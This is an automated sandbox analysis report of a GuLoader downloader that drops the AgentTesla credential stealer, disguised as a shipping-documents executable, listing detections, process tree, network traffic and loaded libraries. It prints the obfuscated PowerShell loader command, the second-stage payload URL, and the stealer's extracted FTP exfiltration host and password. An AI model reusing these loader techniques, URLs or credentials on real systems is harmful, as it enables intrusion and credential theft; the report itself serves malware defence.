Windows Analysis Report
Shipping documents 000022999878999800009999.exe

Overview

General Information

Sample name: Shipping documents 000022999878999800009999.exe
Analysis ID: 1518330
MD5: 4ecafa8f623606caf0a925f5c6b2eb10
SHA1: 59cb79183b9547b3915c8aa09ed904f84bcab22c
SHA256: 3fe8f843e696c1dacbdcabed38d7132776915d89b60ac10c68fda048cbfe044f
Tags: exe, GuLoader, user-abuse_ch

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Shipping documents 000022999878999800009999.exe (PID: 432 cmdline: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe" MD5: 4ECAFA8F623606CAF0A925F5C6B2EB10)
    • powershell.exe (PID: 5008 cmdline: "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wabmig.exe (PID: 4232 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Malware configuration (AgentTesla): {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
Source: 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000008.00000002.3376516352.0000000004687000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000002.00000002.2780799795.00000000094D7000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security

            System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5008, TargetFilename: C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)", CommandLine: "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe", ParentImage: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe, ParentProcessId: 432, ParentProcessName: Shipping documents 000022999878999800009999.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)", ProcessId: 5008, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T16:00:07.729876+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49720 | 185.29.11.53 | 80 | TCP


            AV Detection

Source: http://ftp.concaribe.com | Avira URL Cloud: Label: malware
Source: Shipping documents 000022999878999800009999.exe.432.0.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
Source: C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe | ReversingLabs: Detection: 26%
Source: Shipping documents 000022999878999800009999.exe | ReversingLabs: Detection: 26%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Shipping documents 000022999878999800009999.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: Shipping documents 000022999878999800009999.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 | source: powershell.exe, 00000002.00000002.2768740707.00000000005FA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: qm.Core.pdbE | source: powershell.exe, 00000002.00000002.2775532254.0000000006CDD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbhx | source: powershell.exe, 00000002.00000002.2779696439.0000000007FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb | source: powershell.exe, 00000002.00000002.2779696439.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Code function: 0_2_00402910 FindFirstFileW
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Code function: 0_2_004068B4 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: Joe Sandbox View | IP Address: 104.26.13.205
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49720 -> 185.29.11.53:80
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0; Host: api.ipify.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bgJJbKBK219.bin HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: 185.29.11.53; Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ftp.concaribe.com
Source: wabmig.exe, 00000008.00000002.3393389879.00000000237A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://185.29.11.53/bgJJbKBK219.bin
Source: wabmig.exe, 00000008.00000002.3381693291.0000000008713000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.29.11.53/bgJJbKBK219.bin-
Source: wabmig.exe, 00000008.00000002.3381693291.0000000008713000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.29.11.53/bgJJbKBK219.bine
Source: wabmig.exe, 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://concaribe.com
Source: powershell.exe, 00000002.00000002.2768740707.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2775532254.0000000006C59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: wabmig.exe, 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.concaribe.com
Source: Shipping documents 000022999878999800009999.exe, 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Shipping documents 000022999878999800009999.exe, 00000000.00000000.2125866362.000000000040A000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2770069305.00000000048B1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2770069305.00000000048B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2775532254.0000000006D12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.micXO
Source: powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Code function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

            System Summary

Source: initial sample | Static PE information: Filename: Shipping documents 000022999878999800009999.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File created: C:\Windows\SysWOW64\sennepssovsen
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Code function: 0_2_00406DC6
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Code function: 0_2_0040759D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0424EAE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0424F3B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0424E798
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 8_2_0083E370
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 8_2_0083AAB0
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 8_2_00834A58
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 8_2_00833E40
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 8_2_00834188
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 8_2_0083AAAA
Source: Shipping documents 000022999878999800009999.exe | Static PE information: invalid certificate
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/12@2/3
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Code function: 0_2_004021AF CoCreateInstance
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File created: C:\Users\user\AppData\Local\acneform
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1056:120:WilError_03
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File created: C:\Users\user\AppData\Local\Temp\nsx1143.tmp
Source: Shipping documents 000022999878999800009999.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File read: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
Source: unknown | Process created: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: secur32.dll
